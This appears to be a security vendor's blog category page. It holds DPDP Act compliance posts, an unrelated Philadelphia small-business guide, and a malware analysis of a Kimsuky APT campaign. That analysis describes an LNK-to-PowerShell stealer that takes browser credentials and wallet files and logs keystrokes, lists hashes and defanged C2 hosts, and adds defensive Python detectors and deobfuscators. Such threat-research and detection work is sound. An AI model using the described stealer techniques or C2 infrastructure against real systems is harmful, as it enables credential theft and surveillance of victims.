Category: Operating system core

  • Importance of Digital Personal Data Protection for Retail Sector

    India’s retail sector is undergoing a significant digital transformation, with e-commerce, loyalty programs, and personalized marketing becoming the norm. This evolution means retailers are collecting and processing vast amounts of customer data, making compliance with the Digital Personal Data Protection (DPDP) Act 2023 a business necessity.

    This blog explores why the DPDP Act is critical for the Indian retail ecosystem, highlighting its role in strengthening customer trust, enhancing data security, and ensuring responsible data management. By aligning with this legislation, retailers can meet regulatory requirements and differentiate themselves through stronger data governance and transparency.

    • Building Stronger Customer Relationships Through Trust

    Customer trust is a critical business asset in today’s competitive retail landscape. The DPDP Act grants consumers (Data Principals) key rights over their data, including access, correction, and erasure under specific conditions. By aligning with the DPDP Act’s compliance framework, retailers can reinforce their commitment to data privacy and transparency, strengthening customer relationships.

    These principles enhance brand credibility and foster long-term customer loyalty, positioning retailers as responsible data stewards in an evolving digital marketplace.

    • Ensuring Data Security in a Digital Marketplace

    The retail sector faces growing cybersecurity risks, with data breaches potentially exposing sensitive customer information such as payment details and contact data. Under the DPDP Act, as Data Fiduciaries, retailers must implement robust security measures to prevent breaches and promptly notify the Data Protection Board of India and affected customers in case of an incident.

    By prioritizing compliance-driven data security, retailers can mitigate cyber risks, protect customer information, and safeguard brand reputation, ensuring long-term business resilience in an increasingly digital landscape.

      • Promoting Fair and Transparent Data Practices

    The DPDP Act enforces key principles like purpose limitation and data minimization. It requires retailers to collect only necessary data for defined purposes—such as processing transactions or personalizing offers—and retain it only as long as needed.

    By adopting transparent data practices, retailers can ensure ethical data usage, reduce compliance risks, and enhance customer confidence. The Act also mandates clear customer notifications on data collection and usage, reinforcing trust and regulatory accountability in an increasingly data-driven retail landscape.

    • Ensuring Regulatory Compliance in a Growing Sector

    The DPDP Act establishes a comprehensive legal framework for data protection, which is crucial for India’s rapidly expanding retail industry. Compliance ensures that retailers meet regulatory standards for processing digital personal data, mitigating risks of penalties and legal liabilities.

    By aligning with the Act’s requirements, retailers can reinforce their commitment to ethical data practices, enhance customer trust, and operate with greater transparency and accountability in the evolving digital marketplace.

    • Empowering Consumers with Control Over their Data

    The DPDP Act grants consumers the right to access, correct, and request the erasure of their digital personal data held by retailers. To ensure compliance, businesses must implement efficient mechanisms for handling these requests within the legal framework.

    By prioritizing consumer data rights, retailers can enhance transparency, strengthen accountability, and foster trust, allowing customers to make informed decisions about the data they share—ultimately improving brand credibility and customer engagement.

    • Key Compliance Obligations for Retailers under the DPDP Act

    Retailers must align with several critical obligations under the DPDP Act 2023 to ensure compliance and data protection:

    • Obtaining Informed Consent: Customer consent is required to process personal data, including marketing and loyalty programs.
    • Implementing Security Measures: Strong technical and organizational controls must safeguard customer data, such as secure access to corporate resources and endpoint protection.
    • Data Breach Notification: Any data breaches must be promptly reported to the Data Protection Board and affected customers.
    • Data Retention Policies: Clear policies must ensure customer data is retained only as long as necessary for its intended purpose.
    • Handling Data Principal Rights Requests: Efficient processes should be in place to manage customer requests for data access, correction, and erasure.
    • Potential Appointment of a Data Protection Officer (DPO): Large retailers classified as Significant Data Fiduciaries may be required to appoint a DPO for compliance oversight.


    • Navigating the Path to DPDP Compliance in Retail

    Retailers must take a proactive approach to ensure compliance with the DPDP Act. This includes conducting a comprehensive assessment of current data processing practices and updating privacy policies to align with regulatory requirements.

    Staff training on data privacy protocols and investing in data privacy management systems are essential. Additionally, retailers must establish clear procedures for obtaining and managing customer consent, ensuring compliance, transparency, and enhanced customer trust in the digital marketplace.

    Building a Privacy-First Retail Ecosystem

    The Digital Personal Data Protection Act 2023 is pivotal in strengthening data security and trust in India’s retail sector. The Act enhances customer relationships and industry integrity by enforcing responsible data handling, empowering consumers, and prioritizing privacy compliance.

    Retailers who proactively adopt DPDP Act compliance fulfill legal requirements and gain a competitive edge by showcasing their commitment to customer data protection. Seqrite offers comprehensive data protection solutions to help retailers navigate compliance complexities and implement robust security frameworks. Contact us or visit our website for information.





  • Kimsuky APT Targets South Korea with Deceptive PDF Lures


    Kimsuky: A Continuous Threat to South Korea with Deceptive Tactics

    Contents

    • Introduction
    • Infection Chain
    • Initial Findings
    • Campaign 1
      • Looking into PDF document.
    • Campaign 2
      • Looking into PDF document.
    • Technical Analysis
    • Conclusion
    • Seqrite Protection
    • MITRE ATT&CK
    • IOCs

    Introduction:

    Security researchers at Seqrite Labs have recently uncovered two distinct campaigns carried out by the APT group “Kimsuky,” also known as “Black Banshee.” This group has been actively targeting South Korea using evolving tactics. In these campaigns, the threat actors delivered two South Korean government-themed documents as lures, specifically targeting government entities within South Korea.

    In this blog, we delve into the technical details of the campaigns uncovered during our analysis. We examine the various stages of infection, starting with a phishing email carrying an LNK (shortcut) file attachment. The LNK file was designed to drop an obfuscated VBA (Visual Basic for Applications) script. After de-obfuscating the script, we found that it was responsible for dropping two additional files: one PDF file and one ZIP file. The ZIP file contained four malicious files: two log files (1.log and 2.log), one VBA script (1.vba), and one PowerShell script (1.ps1). Both campaigns involved the same set of malicious files.

    Infection Chain:

    Fig .1 infection chain

    Initial Findings:

    Campaign-1:

    In the first campaign, we identified a document related to tax reduction and revenue-related tax payment, which was delivered with the same malicious LNK attachment. This attachment subsequently deployed a malicious VBScript, facilitating further compromise.

    Fig.2 Revanue.pdf file

    Based on our initial findings, we discovered that the adversary utilized a different document containing the same LNK file content.

    Campaign-2:

    In campaign-2, it has come to our attention that South Korea has enacted a new policy aimed at preventing recidivism among sex offenders. The initiative involves circulating a detailed document outlining the regulations, which was shared with households, daycare centres, kindergartens, and various local administrative offices, including township and village authorities as well as neighbourhood community centres. Hackers, including cyber-criminals, are exploiting this dissemination process by sending deceptive emails containing harmful attachments. These emails target residential recipients and key personnel at local offices.

    Fig.3 Sex Offender Personal Information Notification.pdf

    The adversaries have exploited the distribution of this document by circulating it via email under the filename 성범죄자 신상정보 고지.pdf.lnk (Sex Offender Personal Information Notification.pdf.lnk). The attachment is a malicious LNK file, which poses a cybersecurity threat to the recipients.

    Technical Analysis and Methodology:

    Campaign 1 & 2:

    We downloaded the file named 28f2fcece68822c38e72310c911ef007f8bd8fd711f2080844f666b7f371e9e1.lnk from campaign-1 and “성범죄자 신상정보 고지.pdf.lnk” (Sex Offender Personal Information Notification.pdf.lnk) from campaign-2, both of which were shared via email. During analysis, the LNK file fetches additional files from an external C2 server, as shown in the snapshot below.

    Fig.4 Downloading VBScript from C2 (Campaign-1)

    Fig.5 Downloading VBScript from C2 (Campaign-2)

    The file was downloaded from the URL provided above and saved into the Temp folder, as indicated below.

    Fig.6 Downloaded into Temp folder (Campaign-1)

    Fig.7 Downloaded into Temp folder (Campaign-2)

    The file downloaded from the C2 server is an obfuscated VBScript. Upon de-obfuscating the script, we discovered two additional embedded files: one PDF and one ZIP file.

    Fig .8 Obfuscated VB Script

    The first section of the file is encoded in Base64 strings.

    Fig .9 Base64 Encoded PDF

    After decoding it, we found one PDF file.

    Fig.10 PDF after decoding

    The second part of the VBScript is also Base64-encoded. After decoding it, we discovered a ZIP file.

    Fig.11 ZIP file

    Fig.12 Detect It Easy

    The ZIP archive contains the following files:

    Fig .13 Inside Zip File

    Within the ZIP archive, four files were identified: a VBScript, a PowerShell script, and two Base64-encoded text files. These encoded text files house obfuscated data, which, upon further dissection, may yield critical intelligence regarding the malware’s functionality and objectives. The following figures illustrate the encoded content of the two text files, which will be subsequently decoded and analysed to elucidate the next phase in the attack chain.
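    The two-stage dropper described above (a VBScript whose Base64 string literals decode to a PDF lure and a ZIP of follow-on scripts) can be triaged statically, without running the script. The Python below is an added example written for this page, not code from Seqrite or from the sample: it carves every long Base64 run out of a script body, decodes it, classifies the result by magic bytes, and lists the members of any ZIP it finds. The dropper it runs against is constructed inline, with a placeholder PDF and a ZIP carrying the four file names the analysis reports.

```python
import base64
import io
import re
import zipfile

# Magic bytes for the two container formats the dropper described above embeds.
MAGIC = {
    b"%PDF-": "pdf",
    b"PK\x03\x04": "zip",
}

# A base64 run long enough to be an embedded payload rather than an ordinary string.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def identify(blob):
    """Classify a decoded blob by its leading magic bytes."""
    for magic, kind in MAGIC.items():
        if blob.startswith(magic):
            return kind
    return "unknown"


def carve_payloads(script):
    """Decode every base64 run in a script body and describe what it contains.

    Returns a list of dicts with offset, kind ('pdf', 'zip' or 'unknown'),
    decoded size and, for ZIP blobs, the member file names.
    """
    found = []
    for m in B64_RUN.finditer(script):
        run = m.group(0)
        if len(run) % 4:            # padded base64 is always a multiple of 4 chars
            continue
        try:
            blob = base64.b64decode(run, validate=True)
        except ValueError:
            continue
        entry = {"offset": m.start(), "kind": identify(blob), "size": len(blob)}
        if entry["kind"] == "zip":
            try:
                with zipfile.ZipFile(io.BytesIO(blob)) as zf:
                    entry["members"] = zf.namelist()
            except zipfile.BadZipFile:
                entry["members"] = None   # truncated or corrupted archive
        found.append(entry)
    return found


def build_sample_dropper():
    """Constructed stand-in for the obfuscated dropper (not the real sample):
    a VBScript fragment holding a placeholder PDF and a ZIP with the four
    file names the analysis above reports (1.log, 2.log, 1.vbs, 1.ps1)."""
    pdf = b"%PDF-1.4\n% constructed placeholder, not a real document\n%%EOF\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in ("1.log", "2.log", "1.vbs", "1.ps1"):
            zf.writestr(name, "placeholder content (constructed)\n")
    lines = [
        b"Dim a, b",
        b'a = "' + base64.b64encode(pdf) + b'"',
        b'b = "' + base64.b64encode(buf.getvalue()) + b'"',
        b"' the real dropper decodes a and b and writes them to the Temp folder",
    ]
    return b"\n".join(lines)


if __name__ == "__main__":
    for entry in carve_payloads(build_sample_dropper()):
        print(entry)
```

    The 64-character minimum keeps short literals and variable names out of the candidate set; `validate=True` rejects runs that merely look like Base64. Because classification is by magic bytes rather than by the script's own variable names, the same carver works on a dropper that renames its variables or splits the decoding logic differently.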

    Fig.14 1.log file with Base64 encoding

    Fig.15 2.log file with Base64 encoding

    The 1.vbs file employs advanced obfuscation techniques, utilizing the chr() and CLng() functions to dynamically construct characters and invoke commands at runtime. This strategy effectively circumvents signature-based detection mechanisms, allowing the script to evade detection during execution.

    Upon script termination, the concatenated characters form a complete command, which is subsequently executed. This command is likely designed to invoke the 1.ps1 PowerShell script, passing 1.log as an argument for further processing.
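    Character-by-character construction with chr() and CLng() defeats string signatures, but it can be undone statically because every token is a literal. The Python below is an added example for this page, not Seqrite's tooling or the sample's own code: it evaluates a VBScript concatenation of Chr(n), Chr(CLng("&Hxx")) and Chr(CLng(n)) calls plus plain quoted literals into the string the script would build, and adds a density heuristic an analyst can use to flag this style of obfuscation in bulk. The obfuscated expression is constructed for the example and reconstructs only the "1.ps1 1.log" argument string the analysis above mentions.

```python
import re

# One token of the obfuscated expression: a Chr(...) call in any of the three
# forms seen in the script (Chr(n), Chr(CLng("&Hxx")), Chr(CLng(n))), or a
# plain quoted literal that is concatenated with "&".
TOKEN = re.compile(
    r'Chr\s*\(\s*(?:CLng\s*\(\s*"?(&H[0-9A-Fa-f]+|\d+)"?\s*\)|(\d+))\s*\)'
    r'|"([^"]*)"',
    re.IGNORECASE,
)


def vb_clng(literal):
    """Mimic VBScript CLng() for the literal forms the obfuscator uses:
    a decimal number or an &H-prefixed hexadecimal number."""
    literal = literal.strip()
    if literal[:2].upper() == "&H":
        return int(literal[2:], 16)
    return int(literal)


def deobfuscate(expr):
    """Statically evaluate a Chr()/CLng() concatenation into the string it
    would build at runtime, without executing any script."""
    out = []
    for m in TOKEN.finditer(expr):
        clng_arg, chr_arg, literal = m.groups()
        if literal is not None:
            out.append(literal)
        else:
            out.append(chr(vb_clng(clng_arg if clng_arg is not None else chr_arg)))
    return "".join(out)


def chr_density(script):
    """Triage heuristic: fraction of non-blank characters spent on Chr( calls.
    Ordinary scripts score near 0; character-by-character obfuscation scores high."""
    body = "".join(script.split())
    if not body:
        return 0.0
    calls = len(re.findall(r"Chr\s*\(", script, re.IGNORECASE))
    return calls * 4 / len(body)   # 4 = len("Chr(")


# Constructed sample (not the actual 1.vbs): builds "1.ps1 1.log" one character at a time.
SAMPLE_OBFUSCATED = (
    'Chr(CLng("&H31")) & Chr(46) & Chr(CLng(112)) & Chr(115) & Chr(CLng("&H31")) '
    '& " " & Chr(49) & Chr(CLng("&H2E")) & Chr(108) & Chr(CLng(111)) & Chr(103)'
)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_OBFUSCATED))
    print(round(chr_density(SAMPLE_OBFUSCATED), 2))
```

    The evaluator deliberately handles only literal arguments; if a script feeds CLng() a variable or an arithmetic expression, the regex leaves that token unmatched and the output is visibly incomplete rather than silently wrong, which is the behaviour you want from a static tool.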

    Fig .16 – 1.vbs

    Upon de-obfuscating the VBScript, we uncovered the following command line, which in turn triggers the PowerShell script for further processing.

    Fig .17  De-Obfuscated VB Script

    Upon executing the 1.vbs file, it triggered the invocation of the 1.ps1 file, as illustrated in the snapshot below.

    Fig .18 Executing 1.VBS

    The 1.ps1 script includes a function designed to decode Base64-encoded data from the 1.log file and execute the resulting script.

    Fig.19 1.ps1 file

    Fig.20 1.log after decoding

    The 1.ps1 script retrieves the BIOS serial number, a unique system identifier, from the compromised host. This serial number is then used to create a dedicated directory within the system’s temporary folder, so that attack-related files are stored in a location specific to the compromised machine, as shown in the snapshot above.

    As a VM-aware sample, the script checks if it is executing within a virtual machine environment. If it detects a virtual machine, it will delete all four files associated with the attack (1.vbs, 1.ps1, 1.log, and any payload files stored in the directory named after the serial number), effectively halting its execution, as illustrated.

    The script encompasses 11 functions that define the subsequent phases of the malware’s operation, which include data exfiltration, cryptocurrency wallet information theft, and the establishment of Command-and-Control (C2) communications. These functions are integral to the attack’s execution, facilitating the malware’s objectives and ensuring persistent communication with the threat actor.

    List of malicious functions retrieved from the 1.log file:

    1. UploadFile ():

    The upload function exfiltrates data by transmitting it to the server in 1MB chunks, allowing it to handle large file sizes efficiently. The script awaits a response from the server, and if it receives an HTTP status code of “200,” it proceeds with further execution. If the response differs, the script terminates its operation. Each chunk is sent via an HTTP POST request, with the function verifying the success of each upload iteration before continuing.

    Fig .21 UploadFile()
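    The chunked upload pattern described above also leaves a recognisable footprint in web-proxy logs: a run of POST requests of exactly the chunk size to one host, each answered with HTTP 200, followed by a smaller final chunk. The following Python detector is an added example written for this page, not code from Seqrite or from the sample. The CSV proxy log it reads is constructed, and the host name exfil-placeholder.example is a placeholder rather than the campaign's C2.

```python
import csv
import io
from collections import defaultdict

CHUNK = 1024 * 1024  # the 1 MB chunk size described in the UploadFile analysis above

# Constructed proxy log (CSV): timestamp, client, method, host, path, request bytes, status.
SAMPLE_LOG = """\
ts,client,method,host,path,req_bytes,status
2025-03-01T10:00:01Z,10.0.0.5,GET,update.example.com,/catalog,312,200
2025-03-01T10:00:04Z,10.0.0.5,POST,exfil-placeholder.example,/upload,1048576,200
2025-03-01T10:00:06Z,10.0.0.5,POST,exfil-placeholder.example,/upload,1048576,200
2025-03-01T10:00:08Z,10.0.0.5,POST,exfil-placeholder.example,/upload,1048576,200
2025-03-01T10:00:10Z,10.0.0.5,POST,exfil-placeholder.example,/upload,524288,200
2025-03-01T10:00:12Z,10.0.0.9,POST,crm.example.com,/api/form,2048,200
2025-03-01T10:00:15Z,10.0.0.9,POST,crm.example.com,/api/form,1048576,500
"""


def parse_log(text):
    """Parse the CSV log into dicts with numeric request size and status."""
    rows = list(csv.DictReader(io.StringIO(text)))
    for r in rows:
        r["req_bytes"] = int(r["req_bytes"])
        r["status"] = int(r["status"])
    return rows


def detect_chunked_uploads(rows, chunk=CHUNK, min_full_chunks=2):
    """Flag (client, host) pairs that send at least `min_full_chunks` POST
    requests of exactly `chunk` bytes, each acknowledged with HTTP 200.

    A single large POST is normal; a train of identically sized, acknowledged
    POSTs is what a chunked uploader produces. The sum of acknowledged bytes
    (including a trailing partial chunk) estimates how much data left."""
    by_pair = defaultdict(list)
    for r in rows:
        if r["method"] == "POST":
            by_pair[(r["client"], r["host"])].append(r)

    findings = []
    for (client, host), posts in by_pair.items():
        full = [p for p in posts if p["req_bytes"] == chunk and p["status"] == 200]
        if len(full) >= min_full_chunks:
            acknowledged = sum(p["req_bytes"] for p in posts if p["status"] == 200)
            findings.append({
                "client": client,
                "host": host,
                "full_chunks": len(full),
                "bytes_acknowledged": acknowledged,
                "first_seen": posts[0]["ts"],
            })
    return findings


if __name__ == "__main__":
    for f in detect_chunked_uploads(parse_log(SAMPLE_LOG)):
        print(f)
```

    Only 200-acknowledged chunks are counted because, as the analysis notes, the uploader stops on any other status; the 10.0.0.9 entries show a legitimate form POST and a failed large upload that the rule correctly ignores. On a real proxy feed, pair this with the host's reputation and the volume threshold your environment tolerates.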

    2. GetExWFile ():

    The GetExWFile function iterates through a set of predefined hash tables containing cryptocurrency wallet extensions. When a match is found, it identifies the “.ldb” and “.log” files linked to those extensions for exfiltration. These files are then copied to the destination folder indicated by the $Storepath variable.

    Fig.22 GetExWFile ()

    3. GetBrowserData ():

    The script checks whether any of the following browsers—Edge, Firefox, Chrome, or Naver Whale—are actively running, to extract user profile data, including cookies, login credentials, bookmarks, and web data. Prior to collecting this information, the script terminates the browser processes to ensure uninterrupted access. It then proceeds to retrieve data on installed extensions and cache files, such as webcacheV01.dat, for each identified browser. For certain browsers, it also performs decryption operations to unlock encrypted keys, allowing it to extract sensitive information, which is then stored alongside the decrypted master encryption key.

    Fig.23 BrowserData ()

    4. Download file () :

    The DownloadFile function downloads an arbitrary file when instructed to do so by a C2 command.

    Fig.24 Download File ()

    5. RegisterTask () :

    It creates persistence for the files “1.log” and “1.vbs”.

    Fig.25 RegisterTask()

    6. Send ():

    The send () function uploads all the collected information to the server after compressing the data into a ZIP file named “init.zip”. It then renames the ZIP file to “init.dat” and deletes all backup files from the system after uploading.

    Fig.26 Send ()

    The execution flow of the functions follows a sequence where several actions are carried out within the attack. Among these functions, one triggers another PowerShell command that calls the 2.log file, which is responsible for performing keylogging activities.
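    The chain laid out above (1.vbs launching 1.ps1 with 1.log as its argument, and a scheduled task re-running the dropped scripts from the Temp folder) can be expressed as endpoint detection logic. The Python below is an added example for this page, not Seqrite's detection content. It runs over constructed, normalized process-creation and task-registration events; the field names event, host, parent, image, cmdline, task and action are this example's own schema rather than any product's, and the user name u and task name \Updater are placeholders.

```python
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# "-File <script.ps1> [first argument]" as it appears on a PowerShell command line
FILE_ARG = re.compile(r"-File\s+(\S+\.ps1)\s*(\S+)?", re.IGNORECASE)

# Constructed, normalized endpoint telemetry (not events from the original analysis).
EVENTS = [
    {"event": "process_create", "host": "WS-01",
     "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Users\u\AppData\Local\Temp\1.ps1 C:\Users\u\AppData\Local\Temp\1.log"},
    {"event": "process_create", "host": "WS-02",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1 -Verbose"},
    {"event": "task_registered", "host": "WS-01", "task": r"\Updater",
     "action": r"C:\Windows\System32\wscript.exe C:\Users\u\AppData\Local\Temp\1.vbs"},
    {"event": "task_registered", "host": "WS-03", "task": r"\Backup",
     "action": r"C:\Program Files\Backup\agent.exe --nightly"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()


def triage(events):
    """Score events for the staging pattern above; return the alerts raised."""
    alerts = []
    for e in events:
        if e["event"] == "process_create" and basename(e["image"]) == "powershell.exe":
            m = FILE_ARG.search(e["cmdline"])
            script = m.group(1) if m else ""
            first_arg = (m.group(2) or "") if m else ""
            reasons = []
            if basename(e["parent"]) in SCRIPT_HOSTS:
                reasons.append("PowerShell spawned by a script host (wscript/cscript)")
            if script and TEMP_DIR.search(script):
                reasons.append("script file located in the user's Temp folder")
            if first_arg.lower().endswith(".log"):
                reasons.append("a .log file passed to the script as input")
            # Any single indicator is noisy on its own; two or more together are not.
            if len(reasons) >= 2:
                alerts.append({"rule": "staged-powershell", "host": e["host"], "reasons": reasons})
        elif e["event"] == "task_registered":
            launcher = basename(e["action"].split()[0])
            if launcher in SCRIPT_HOSTS | {"powershell.exe"} and TEMP_DIR.search(e["action"]):
                alerts.append({"rule": "temp-script-persistence", "host": e["host"],
                               "reasons": [f"scheduled task {e['task']} runs {launcher} on a file in Temp"]})
    return alerts


if __name__ == "__main__":
    for alert in triage(EVENTS):
        print(alert)
```

    The rules key on behaviour (script host parentage, Temp-folder scripts, a non-script file consumed as script input, a task whose action is a script host pointed at Temp) rather than on the names 1.vbs or 1.log, so a renamed drop still fires; the administrative backup script on WS-02 and the vendor agent task on WS-03 show the benign cases that stay quiet.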

    Fig.27 Flow of execution of functions and command to execute “2.log”

    Fig.28 Executing 2.log file

    Fig.29 Inside 2.log file

    The decoded content of the 2.log file is shown above. It contains a script that imports essential Windows API functions for detecting key presses, retrieving window titles, and managing keyboard states. The script executes actions such as clipboard monitoring, keystroke logging, and recording window titles.

    Fig. 30.2 Code for clipboard monitoring.

    Conclusion

    As observed, threat actors are utilizing time-consuming, multi-component techniques that are interlinked to enhance their evasiveness. Unlike other stealers, this one primarily focuses on network-related information, which could be leveraged for active reconnaissance. Given that the stealer targets sensitive user data, it is crucial to protect yourself with a reputable security solution such as Seqrite Antivirus in today’s digital landscape. At Seqrite Lab, we provide detection capabilities for such stealers at various stages of infection, along with protection against the latest threats.

    Seqrite Protection:

    • Trojan.49424.SL
    • Trojan.49422.C

    MITRE ATT&CK:

    Initial Access        T1566.001  Phishing: Spearphishing Attachment
    Execution             T1059.001  Command and Scripting Interpreter: PowerShell
    Execution             T1059.005  Command and Scripting Interpreter: Visual Basic
    Persistence           T1547.001  Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
    Defense Evasion       T1140      Deobfuscate/Decode Files or Information
    Credential Access     T1555.003  Credentials from Password Stores: Credentials from Web Browsers
    Discovery             T1082      System Information Discovery
    Collection            T1056.001  Input Capture: Keylogging
    Command and Control   T1071.001  Application Layer Protocol: Web Protocols
    Exfiltration          T1041      Exfiltration Over C2 Channel

    IoCs:

    MD5  File Name
    1119A977A925CA17B554DCED2CBABD8  *.lnk
    64677CAE14A2EC4D393A81548417B61B  1.log
    F0F63808E17994E91FD397E3A54A80CB  2.log
    A3353EA094F45915408065D03AE157C4  prevenue.hta
    CE4549607E46E656D8E019624D5036C1  1.vbs
    1B90EFF0B4F54DA72B19195489C3AF6C  *.lnk
    1D64508B384E928046887DD9CB32C2AC 성범죄자 신상정보 고지.pdf.lnk

    C2

    • hxxps[:]//cdn[.]glitch[.]global/
    • hxxp[:]//srvdown[.]ddns.net

    Authors

    Dixit Panchal

    Kartik Jivani

    Soumen Burma

  • How to Start a Thriving Business in Philly


    Starting a thriving business in Philly is a way to bring your dreams into reality, whether you’ve always wanted to own a fashion line or provide products that are in demand in your own community. If you’re thinking of building a business in Philly, there are a few tips and tricks to keep close to you every step of the way. The more familiar you are with Philadelphia, its growth, and its evolution, the easier it’ll be for you to set up a shop with the best chances of success.

    Choosing the Right Location

    According to Enviro USA, Denmark is currently ranked as the cleanest country in the entire world. Any time your dreams consist of opening a thriving company in Philadelphia, you’ll want to take some time to research cleanliness factors, crime rates, and even the number of successful businesses that already exist in areas you consider to be prime real estate. Selecting the right location can mean the difference between having the ability to promote your goods and remaining off the radar of the locals in your community.

    Minimize the Risk of Crime

    In 2019, residents of Pennsylvania reported more than 39,228 cases of violent crimes, according to the direct FBI Uniform Crime Reporting Program unit. Unfortunately, there are many different cities and boroughs that are not considered safe in Philly today, especially when it comes to setting up shops or launching businesses.

    But, with the advent of online search engines and live reports of crimes and incidents, it’s now easier than ever to keep an eye on the busiest, cleanest, and safest areas in Philly right from home or even with the use of your smartphone. You can use live updates, published crime statistics, and even input from nearby business owners to determine locations that are ideal for the type of business you’re interested in opening in Philly.

    Set Your Business and Brand Apart

    You will need to consider how you will be setting your brand apart when you’re operating in Philly, even if you do so online. Creating a designated brand that is unlike any other will help others remember you. Use unique logos and slogans to help others remember your brand name. Consider hosting contests and/or giveaways that will attract attention to your business while also helping you spread the word as you boost sales and the notoriety your business has around Philly at the time.

    Create an Online Presence

    Connecting to the internet without lag time while gaining access to networks and websites much faster is possible with the use of 5G. Having the internet is one of the best ways to set your business apart, whether you’re offering to fix electronics, repair them, or if you have clothing to sell. The more connected you are to the internet, the easier it will be for you to maximize your reach while spreading the image of your brand. An online presence can include a traditional website, social media page, newsletters, and even a live stream page to promote your products, services, and even items you intend to give away.

    The more immersed and engaged you become in Philly, the easier it’ll be for you to build a thriving business of your own, regardless of your preferred and/or designated industry. From selling comic books and retail shirts to offering unique one-of-a-kind street foods, there are many different avenues to consider when you’re looking to build a thriving business in Philly today. The right vision and an understanding of Philly’s culture will go a long way once you make the leap into the world of entrepreneurship. Best of luck in your journey!




  • The Importance of DPDP Act for BFSI Sector Today


    The Digital Personal Data Protection (DPDP) Act 2023 marks a pivotal shift in India’s data protection framework, setting clear guidelines for managing personal data. For the Banking, Financial Services, and Insurance (BFSI) sectors, which process vast volumes of sensitive customer information, this legislation is not just another compliance requirement but a strategic imperative.

    The DPDP Act 2023 strengthens data security, fosters customer trust, and enhances regulatory alignment, making it a cornerstone for a resilient and customer-centric BFSI ecosystem. This blog delves into the critical reasons why this legislation is essential for the sector.

    1. Building Customer Trust and Confidence

    In the BFSI sector, trust is the foundation of strong customer relationships. The DPDP Act 2023 enhances this trust by empowering individuals (Data Principals) with greater control over their personal data, including rights to access, rectify, and request erasure under specific conditions. By aligning with the DPDP Act’s principles, BFSI organizations can reinforce their commitment to data privacy and security, strengthening customer confidence.

    This proactive approach safeguards compliance and becomes a competitive differentiator in an era where data protection is a key driver of customer loyalty and business growth.

    2. Enhanced Regulatory Compliance

    The BFSI sector in India operates within a highly regulated ecosystem, overseen by authorities such as the Reserve Bank of India (RBI), the Securities and Exchange Board of India (SEBI), and the Insurance Regulatory and Development Authority of India (IRDAI). The DPDP Act 2023 complements these existing regulations by establishing a unified data protection framework for the sector.

    Ensuring compliance with the DPDP Act helps BFSI organizations meet their legal obligations regarding handling digital personal data. It also mitigates the risks of regulatory penalties and legal repercussions, reinforcing operational resilience and trust.

    3. Strengthening Data Security

    Due to the highly sensitive financial and personal data it handles, the BFSI sector remains a prime target for cyberattacks and data breaches. The DPDP Act 2023 reinforces security by requiring Data Fiduciaries (entities processing personal data) to implement robust safeguards to prevent breaches and mandating timely notifications to the Data Protection Board of India and affected individuals in case of an incident.

    By adhering to these stringent security requirements, BFSI institutions can enhance cybersecurity resilience, mitigate risks, and safeguard customer trust and brand reputation in an increasingly threat-prone digital landscape.

    4. Promoting Responsible Data Handling

    The DPDP Act 2023 enforces key data protection principles, including purpose limitation, data minimization, and storage limitation. For the BFSI sector, this translates to collecting only essential data for defined purposes, retaining it only for the necessary duration, and ensuring its accuracy and integrity.

    By adopting these responsible data management practices, BFSI organizations can mitigate risks associated with data misuse, strengthen regulatory compliance, and reinforce customer trust. It ensures that personal information is handled with the highest standards of security and diligence.

    5. Enabling Innovation with Safeguards

    While prioritizing data protection, the DPDP Act 2023 also acknowledges the need for lawful data processing to drive innovation and service excellence. For the BFSI sector, this enables firms to leverage data for customer insights, risk assessment, and hyper-personalization within a consent-driven framework, ensuring transparency and accountability.

    The Act provides a clear legal foundation for responsible data utilization, empowering BFSI organizations to enhance customer experience, optimize decision-making, and accelerate business growth while maintaining regulatory compliance.

    6. Key Aspects of the DPDP Act Relevant to BFSI

    Several key provisions of the DPDP Act 2023 are particularly critical for the BFSI sector:

    • Consent Requirements: BFSI firms must obtain explicit and informed consent from customers before processing personal data, with limited exceptions for legitimate purposes.
    • Data Security Obligations: Implementing robust technical and organizational safeguards to protect personal data is mandatory.
    • Data Breach Notification: Firms must promptly report breaches to the Data Protection Board and affected customers to ensure transparency and accountability.
    • Data Retention Policies: BFSI entities must establish clear retention policies, ensuring data is stored only for as long as necessary for its intended purpose.
    • Rights of Data Principals: Organizations must enable customers to access, correct, and request erasure of their personal data through well-defined mechanisms.
    • Obligations of Significant Data Fiduciaries: Given the high volume and sensitivity of data handled, many BFSI firms will be classified as Significant Data Fiduciaries, requiring additional compliance measures such as appointing a Data Protection Officer (DPO) and conducting Data Protection Impact Assessments (DPIAs).

    7. Challenges and Opportunities

    Implementing the DPDP Act 2023 presents challenges for the BFSI sector, including adapting existing data processing systems, training employees on compliance requirements, and streamlining consent management. However, these challenges also serve as strategic opportunities to enhance data governance frameworks, fortify cybersecurity measures, and foster greater transparency with customers.

    By proactively addressing these aspects, BFSI organizations can ensure compliance, strengthen trust, improve operational resilience, and drive long-term business growth in an evolving regulatory landscape.

    Conclusion

    The Digital Personal Data Protection (DPDP) Act 2023 is a landmark regulation with far-reaching implications for the BFSI sector in India. The Act fosters a more secure and trustworthy digital financial ecosystem by strengthening data protection, empowering individuals, and enforcing stringent data handling standards. Proactive compliance is not just a legal requirement but a strategic necessity for BFSI institutions to build customer trust, enhance brand reputation, and stay competitive in an evolving digital landscape.

    Seqrite offers a comprehensive suite of data protection solutions to help BFSI organizations navigate the complexities of the DPDP Act and ensure robust compliance.




  • New TTPs and Clusters of an APT driven by Multi-Platform Attacks


